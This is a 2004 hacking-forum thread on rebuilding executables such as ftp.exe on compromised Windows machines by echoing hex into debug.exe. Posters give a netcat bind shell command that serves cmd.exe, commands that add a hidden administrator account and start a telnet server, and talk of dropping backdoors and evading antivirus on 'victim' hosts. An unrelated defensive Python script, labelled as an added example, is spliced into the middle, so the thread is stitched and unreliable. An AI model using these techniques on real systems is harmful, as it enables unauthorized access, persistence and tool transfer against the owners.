101
Mar 14 2004, 07:56 AM
//EDIT: see page 8, better ftp.txt posted.
I recommend using a tool like SecureCRT, SSH1-2, Telnet Client (faster to copy/paste the huge .txt). Copy paste all into SecureCRT, it creates ftp.bat, then run ftp.bat, it will create ftp.exe. Nb: I packed ftp.exe to make the debugging smaller. See page 2 to dl ftp.bat to test locally if you are too lazy to mod the txt. Of course for the guys who dunno, ftp.exe here is an example, you can update to another executable.
the .txt is also attached to the thread at the bottom. Tested on 9x/XP
//EDIT: 2k was bugging, sorry my mistake, fixed version see page 8.
njoy this example ;P
| CODE |
ECHO @ECHO OFF^>1>ftp.bat
ECHO echo e 0100 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00^>^>1>>ftp.bat
ECHO echo e 0110 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00^>^>1>>ftp.bat
ECHO echo e 0120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00^>^>1>>ftp.bat
ECHO echo e 0130 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00^>^>1>>
etc.. etc ... 1096 lines .. to big for the threads .. look at the attached file
|
NOW SOME SMALL TIPS

TIP1: That's easy to use SecureCRT in binding mode, you just have to connect with a telnet method to the port, then copy paste all the txt at 1 time. But in listening?
your localip = 192.168.0.2
run a listening netcat1: nc.exe -vv -L -p 12345 -t -e cmd.exe -s 192.168.0.2
With SecureCRT, do a simple telnet connection on 192.168.0.2:12345 (you'll have a shell of course on your own computer through securecrt)
Open now another listening netcat2 through this local sCRT shell, you'll finally be able to copy paste this huge txt if a victim spawns a shell to this netcat2 ;p

TIP2: You are on a system/admin rights shell without the possibility to copy paste the .txt?
create a user
net user USER PASS /add
net localgroup Administrators USER /add
type tlntsvr.exe, try to connect to the ip port 23 with SecureCRT, it will refuse.
type a second time tlntsvr.exe, try to connect to the ip port 23 with SecureCRT, telnet server is now started without being enabled. (yes I tested it successfully)
login with your created USER/PASS.
You are now under a shell with Telnet & SecureCRT, that's a big step. But because you use telnet, you'll have to copy paste the lines 10 per 10. (I tested, it's not so long, and working)
I had finally a ftp.exe created with the help of a really bad shell at start.

***************

If you can't make it work nm, me I successfully used it on every box where ftp/tftp were missing. You need of course some resources in your brain to find a way to copy paste the huge txt in all situations. I hope my resources helped you, bye
sylver
Mar 14 2004, 08:29 AM
cool what a nice method
stonebreaker
Mar 14 2004, 08:55 AM
wonderful thanks for share it
archiv
Mar 14 2004, 09:01 AM
nice method thx .... but where can i dl the tool for faster copy/paste ?!  thx
eXist
Mar 14 2004, 09:28 AM
Finding it on google isn't hard: hxxp://www.vandyke.com/products/securecrt/index.html Seek and you shall find what you're after.
Interesting method 101, not sure how practical it would be, interesting none the less.
Zyne
Mar 14 2004, 10:17 AM
This definitely seems like a nice "util"... I'm gonna give it a test on my own machine, just to see what it does exactly...  Thanks a lot for putting this together, and sharing this with us m8! Zyne
temptation
Mar 14 2004, 10:56 AM
Hi, thx for this, but i dunno how it works ... I tried to rename the ftp.txt to ftp1.bat und executed it but it was not workin .. an idea?
[EDIT] Ok, now it is workin, sry i was 2 dumb 4 it :/
BuzzDee
Mar 14 2004, 11:04 AM
yes this method is nice! i'm using it quite long now but im doing the following: i create a server on the remote host. i have a little one which has about 10 kb. i just copy & paste it in the remote shell - then i start it and upload servu and so on with flashfxp  that way u never have probs with uploading the files  greetz
EzMe
Mar 14 2004, 11:23 AM
Whow! Never thought this was possible.. Kewl gonna try it
Lovellz
Mar 14 2004, 11:44 AM
Thanks alot for this class101. annoying when u root a puter and they removed ftp.exe  thanks alot matey
boshcash
Mar 14 2004, 12:10 PM
wow nice way man , its a bit complicated but its the best and i think this wont be ever detected by AVs
xzbit
Mar 14 2004, 12:35 PM
big THX 101 for sharing this
TwitcH
Mar 14 2004, 12:56 PM
Methinks this could be useful.....
ZoraX
Mar 14 2004, 01:19 PM
thnx  nice util:D anybody tested that the ftp.exe works?
xDD
Mar 14 2004, 01:36 PM
C:\WINNT\>ftp.exe ftp.exe
C:\WINNT\>
hmmm
WOrk u ? : |
PeOun
Mar 14 2004, 01:41 PM
thx a lot for this nice method
xDD
Mar 14 2004, 02:54 PM
Yeah this do fxp.exe but someone tested this ftp.exe and work ? :|
BuzzDee
Mar 14 2004, 03:07 PM
of course it worx. tested it locally and remotely. both ways worked fine. y shouldnt it work? ^^
xDD
Mar 14 2004, 03:10 PM
Mhmmm
i give this echo command
next ftp.bat run and execute ftp.exe and this file not work ... i will go testing again
101
Mar 14 2004, 03:28 PM
The .txt is the way to create this .bat from a cmd line with ECHO commands. here is the .bat if u wanna test directly on your computer.
so, this thread is not to teach u how to use ftp.exe ... u can also do it with list.exe, kill.exe , ur backdoor y not ;Q , ftp is just a helpful example for who need ;<
xDD
Mar 14 2004, 03:45 PM
Yeah this bat work but i tested this echo command and i dont know but dont work but will testing again later :)
brOmstar
Mar 14 2004, 04:07 PM
fine thx..tested it locally the ftp.exe is created, but when i try to use that ftp.exe i get an error but only on my w2k german sp4 on a remote machine w2k3 server eng it had worked very well ! but who cares the method is the key thx !
boshcash
Mar 14 2004, 06:03 PM
i wanna ask a question if i want to do any exe to convert it to text to be easily replaced with ftp.exe how can i do that
MattMannLT
Mar 14 2004, 06:54 PM
| QUOTE (boshcash @ Mar 14 2004, 06:03 PM) | | i wanna ask a question if i want to do any exe to convert it to text to be easily replaced with ftp.exe how can i do that |
i think you could just use any hex editor
easternerd
Mar 14 2004, 07:33 PM
Innovation is the KeyWord, i really congratulate 101 for showing a very simple yet impressive method where we can take advantage of just the Swiss Army Knife alone.
Erra
Mar 14 2004, 08:17 PM
Nice idea.... will have to give it a go and see if I can get the thing working myself... like it though... good thinking!!
yopman
Mar 14 2004, 09:03 PM
nice idea, i have already posted, it's the hex of an exe, and debug.exe, on all windows machines "compiles" this to an exe. it doesn't work on nt40 machines. you can already use other apps, like cmdget.exe only 1.5kb, download files from http://*. you can convert exe to the hex-format with bin2src, then you must change the header, in the first line from .exe to a non-executable extension like sys, txt or other, because debug.exe "can't build an executable". after the compilation you change the *.txt to *.exe and you have a working exe.
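For defenders triaging a script of this kind, the following added example (not part of the thread or of any poster's tools) decodes the `e` lines of a DEBUG script, in the ECHO-wrapped form quoted in the first post, back into bytes and reports an MZ header, the `n` file name and a later rename to `.exe`. It assumes 16-bit offsets in a single segment with the file image starting at 0x100; the `n` and `ren` lines and all file names in the sample are constructed.

```python
import hashlib
import re

# DEBUG "enter" command, e <addr> <byte> ..., even when wrapped in ECHO layers.
ENTER = re.compile(r"\be\s+([0-9a-f]{1,4})((?:\s+[0-9a-f]{2})+)(?![0-9a-f])", re.I)
# DEBUG "name" command, n <file>: the file name DEBUG will write to.
NAME = re.compile(r"(?:^|echo\s+)n\s+([^\s^>]+)", re.I)
# A later rename/copy to .exe, as described in the thread.
TO_EXE = re.compile(r"\b(?:ren|rename|move|copy)\b.*\.exe\b", re.I)

# Constructed sample in the thread's format: the two `e` lines are the first
# two quoted in the thread; the `n` and `ren` lines and file names are made up.
SAMPLE = r"""ECHO @ECHO OFF^>1>drop.bat
ECHO echo e 0100 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00^>^>1>>drop.bat
ECHO echo e 0110 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00^>^>1>>drop.bat
ECHO echo n sample.sys^>^>1>>drop.bat
ECHO echo ren sample.sys sample.exe^>^>1>>drop.bat
"""

def decode_debug_script(text):
    """Rebuild the bytes the script's `e` commands place at offset 0x100 and up."""
    image, names = bytearray(), []
    for line in text.splitlines():
        m = ENTER.search(line)
        if m:
            offset = int(m.group(1), 16) - 0x100  # DEBUG writes files from 0x100
            if offset < 0:
                continue  # below the load address, not part of the file
            data = bytes.fromhex(m.group(2))
            image.extend(b"\x00" * max(0, offset + len(data) - len(image)))
            image[offset:offset + len(data)] = data
            continue
        n = NAME.search(line)
        if n:
            names.append(n.group(1))
    return bytes(image), names

def triage(text):
    """Summarise a suspected DEBUG-script dropper for an analyst."""
    image, names = decode_debug_script(text)
    return {
        "bytes_recovered": len(image),
        "mz_header": image[:2] == b"MZ",
        "output_names": names,
        "renamed_to_exe": bool(TO_EXE.search(text)),
        "sha256": hashlib.sha256(image).hexdigest(),
    }

if __name__ == "__main__":
    print(triage(SAMPLE))
```

The recovered bytes can be hashed or scanned without ever running the script; gaps between `e` ranges are zero-filled, so a partial paste still yields a comparable image.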
BuzzDee
Mar 14 2004, 09:40 PM
@yopman: r u sure that u can convert it with bin2src? i searched with google, downloaded it and i found out that i can only convert exe-file into c, basic or pascal code with it... but we need hex code ^^ @101: which program did u use to convert the exe? would be nice if u could tell us  greetz, buzz
brOmstar
Mar 14 2004, 10:00 PM
after doing some research i found a handy tool called exe2hex
i would attach it here but here's no button to attach the file (cause i'm trial???)
found this in the board-helpsystem
If the admin has enabled it, you will also see a file attachments option, this will allow you to attach a file to be uploaded when making a post. Click the browse button to select a file from your computer to be uploaded. If you upload an image file, it may be shown in the content of the post, all other file types will be linked to.
???
btw. the tool works really perfect..very simple usage
exe2hex.exe inputfile outputfile
debug < outputfile
it shouldn't be a problem to create a bat or echo.txt based on the outputfile
x1`
Mar 14 2004, 10:17 PM
clever stuff its like u programmed it in binary on the computer wonderif u could do the same with servu or other apps  how did u get the binary code for ftp.exe anyway?
brOmstar
Mar 14 2004, 10:20 PM
u need the hex code of the file not the binary ...how to do ? read one post above  btw this should work with any *.exe
G-Ryder
Mar 14 2004, 10:21 PM
The only trouble with cmdget.exe if I remember right is that it executes the file once it has been downloaded, so if u dont want the file to run you have to remove the extension when u specify where u want to save it.. eg c:\test not c:\test.exe but it would be a lot smaller than ftp.exe so maybe its quicker
101
Mar 14 2004, 10:27 PM
the solution is maybe not so far, njoy your research  (nother example , creates list.exe, process listener)
iWeasel410
Mar 14 2004, 10:31 PM
Wow this is interesting, nice find 101! But what advantages does this prove over other methods?
brOmstar
Mar 14 2004, 10:37 PM
i have written a handy tool in c# together with exe2hex u now need some seconds to create a createmyprogramm.bat ...
i have tested this method with nc.exe/ftp.exe/psinfo.exe works well =)
is it possible to allow me to attach files?
@iWeasel u don't have to upload anything !
Damned_Vampire
Mar 14 2004, 11:09 PM
great work thks for the info
Gotisch
Mar 14 2004, 11:26 PM
Nice tool (hehe  ). brOmstar send it to me ill attach it, or ask a mod to post the file for you.
yopman
Mar 14 2004, 11:52 PM
i'm sorry bin2dbg
brOmstar
Mar 15 2004, 12:27 AM
k gotisch i will send both tools to you (think tomorrow in the morning)... together with an explanation how to use them =)
fry
Mar 15 2004, 05:04 AM
Thanx for the great info 101, thats some really great stuff, although br0mstar's program will be here soon and I can't add attachments either, but i'll add the website's link to the exe2hex program.
exe2hex compiled: http://www.g615.co.uk/riftor/exe2hex.exe
exe2hex C sourcecode: http://www.g615.co.uk/riftor/exe2hex.c
poostew
Mar 15 2004, 05:20 AM
this rocks.
The Storm
Mar 15 2004, 09:07 AM
Very nice work! Gonna test it, very helpful! Gonna try making a new method of breaking SQL_ERROR *g*
BigBen
Mar 15 2004, 09:49 AM
Thx very nice worked fine  Greetz BigBen
FuzZyBeeR
Mar 15 2004, 10:23 AM
Heh This always comes in handy  Thanx for this post!  Tested it and it worked indeed
tribalgoa
Mar 15 2004, 12:01 PM
very interesting method ... will try it out asap and let you all know if it works
BuzzDee
Mar 15 2004, 12:42 PM
thx alot yopman! that was the one i was looking for btw it worx with serv-u, too nice nice nice... greetz, buzz
boshcash
Mar 15 2004, 01:20 PM
i got exe2hex and everything worked fine , bromstar when u finish the program tell me to post it for u
Because programs automates many thing which are :
-adding echo to everyline and output to selected batch name that u want to be created
-converting the exe to binary easily without command line
-adding the n filename.sys line (did u successfully do this or the file created requires manual edit ?)
Thanks alot for creator of this way , and when u get the program ready bromstar plz tell me
arn0ld
Mar 15 2004, 01:35 PM
really useful it's really  when there is not ftp.exe ( tested it and it works fine  )
prog
Mar 15 2004, 02:07 PM
I used to do this sort of thing with linux. Glad nt has adapted it now.
tibbar
Mar 15 2004, 02:45 PM
interesting idea. personally, ive never encountered a situation where tftp and ftp were both not available, but i'll keep this one in reserve for that rainy day.
Cheers m8